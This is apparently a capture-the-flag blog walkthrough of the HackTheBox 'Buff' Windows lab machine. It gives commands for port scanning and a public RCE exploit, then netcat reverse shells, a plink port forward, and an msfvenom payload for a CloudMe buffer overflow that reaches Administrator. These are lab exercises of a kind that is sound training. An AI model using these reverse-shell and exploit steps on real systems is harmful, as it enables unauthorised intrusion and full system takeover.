Buff HackTheBox WalkThrough 

Buff HackTheBox WalkThrough

This is Buff HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step procedure how I was rooted to the Buff htb machine. Before starting lets, know something about this htb box. Buff is a windows machine with IP address 10.10.10.198 and difficulty level easy assigned by its maker. Now I am going to show you my steps.

First of all connect your PC with VPN and confirm the connectivity by pinging the IP 10.10.10.198.

As usual, I began by scanning the IP 10.10.10.198 so that I could get some starting point. Nmap [a port scanner] gave the following results:

Scanning

$ nmap -sV -sC -oN scan 10.10.10.198

Nmap default port Scan performed during Buff HackTheBox Walkthrough

Nmap result shows that only one port is open. So tried to perform full port scan in case any port is missing and not listed in default 1000 ports of Nmap.

$ nmap -sV -sC -p- -oN full_scan 10.10.10.198

nmap full port scan during Buff HackTheBox WalkThrough

Nmap full port scan listed port 7680 and 8080 port is open. Apache2 web server is running on port 8080 and pando-pub service is running on port 7680. After going to URL http://10.10.10.198:8080/contact.php found that the website is using Gym Management Software v1.0.

Contact page on Buff website which reveals Gym Management Software

Immediately, searched Gym Management Software 1.0 exploit over google for available public exploits and found this RCE exploit. Downloaded it locally on my PC and renamed it to access.py. To know more about exploit . You can either follow its steps manually using Burpsuite or simply execute the script along with the URL.

I followed the later one. Executed this script along with URL http://10.10.10.198:8080/ to get remote shell

Getting User Shell

$ python access.py 'http://10.10.10.198:8080/'

Getting User shell in Buff HackTheBox Walkthrough

Capture User Flag

$type C:\Users\shaun\Desktop\user.txt

Buff HackTheBox User Flag during writeup

Upgrade Shell

Let us upgrade the shell to a windows cmd shell so that we can execute our normal windows command in it, which is not possible through the current shell. For these we require netcat binary to execute command on the Buff machine that will open a shell on my local machine. So downloaded nc.exe and plink1.exe from my local computer to Buff htb machine. Don’t worry plink1.exe is actually plink.exe. I have renamed it to differentiate it from other user’s plink.exe on htb box. You can download it from here [size 660KB not 304 KB].

Important: Do not use plink.exe from /usr/share/windows-resources/binaries/ in Kali Linux. Because it may give error of certificate during connection, since it is outdated.

Start Python HTTP Server

$ python3 -m http.server 80

Download Binaries

$ curl http://10.10.14.20/nc.exe -o nc.exe

$ curl http://10.10.14.20/plink1.exe -o plink1.exe

Note: curl command does not work after sometimes after the machine is reset so try to download the binaries as soon as the machine is reset.

Downloading netcat and plink executables on Buff Machine

Getting Reverse Shell

$ nc.exe -e cmd.exe 10.10.14.20 1234 # on buff machine

$ rlwrap nc -nvlp 1234 # on your local machine

Upgrading shell to cmd Shell using Netcat

Privilege Escalation

Finding PrivEsc Vector

After some initial enumeration got an executable file named CloudMe_1112.exe in C:\Users\shaun\Downloads\ directory

$ dir \Users\shaun\Downloads\

Download Folder of user shaun

Then immediately searched using window’s inbuilt command tasklist.exe whether the given executable is running or not.

$ tasklist.exe

Listing of the running processeson buff Hackthebox machine during walkthrough

tasklist.exe gave the result that CloudMe.exe is running at PID 1352. Didn’t know anything about CloudMe_1112.exe software so googled CloudMe_1112.exe and in very first link found a buffer overflow exploit at exploit-db. So here, our privilege escalation vector is Vulnerable Software Version. The exploit can be found here. Downloaded the exploit on my PC. The exploit is written in python language but python is not installed on buff machine so, we have to remote port forward on our local machine.

For this we require a software that can help in port forwarding. The software which I am going to use is plink.exe (same as SSH client on Linux). Since I have already downloaded it on buff machine and renamed it as plink1.exe (just to differentiate), so let us connect to my kali machine and port forward on it.

Note: Make sure SSH, service is running on your kali machine so that you can connect to it.

Tip: You can install SSH on your Linux machine by apt install ssh and start SSH server using service ssh start command

Port Forwarding

$ service ssh start # on your kali machine

$ plink1.exe -l deepak -pw password 10.10.14.20 -R 8888:127.0.0.1:8888 //on buff machine

$ netstat -punta | grep 8888 # on your kali machine to check forwarded port

Port Forwarding on our local computer using plink.exe

Once our port is forwarded we need to create our payload using $msfvenom and replace previous payload of the buffer overflow exploit with ours.

Create Payload

$ msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.20 4500' -b '\x00\x0A\x0D' -f py -v payload

Payload creation during buff hackthebox walkthrough

After replacing the entire payload into the buffer over flow exploit our exploit looks something like this

buffer overflow exploit for cloudme 1.11.2 software

Now we are all set. Just need to exploit and escalate privilege to Administrator

Start netcat listener on port 4500 and run exploit.py on local machine. We will get shell. Let us do the same

$ nc -nvlp 4500

$ python exploit.py

Privilege escalation during walkthrough in buff hackthebox

Note: Only one user can run exploit.py in one machine reset. After running buffer overflow exploit successfully and getting a shell, another user have to reset the machine for his buffer over flow exploit to work. This may be because this exploit will crash the process and the process is to be restart again, which is only possible if machine is reset or some admin user start it explicitly.

Capture Root Flag

$ type C:\Users\Administrator\Desktop\root.txt

buff hackthebox root flag during walkthrough

This was how I rooted to Buff HackTheBox machine. Learnt a lot after hacking this box. Hope you guys have also learnt some new thing from this walkthrough. Thanks for reading. For any query and suggestion, please write us at [email protected]. Read other windows box walkthrough here.

Really like the website please buy me a coffee to keep this site alive and receive walkthrough without interruption on weekly basis.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.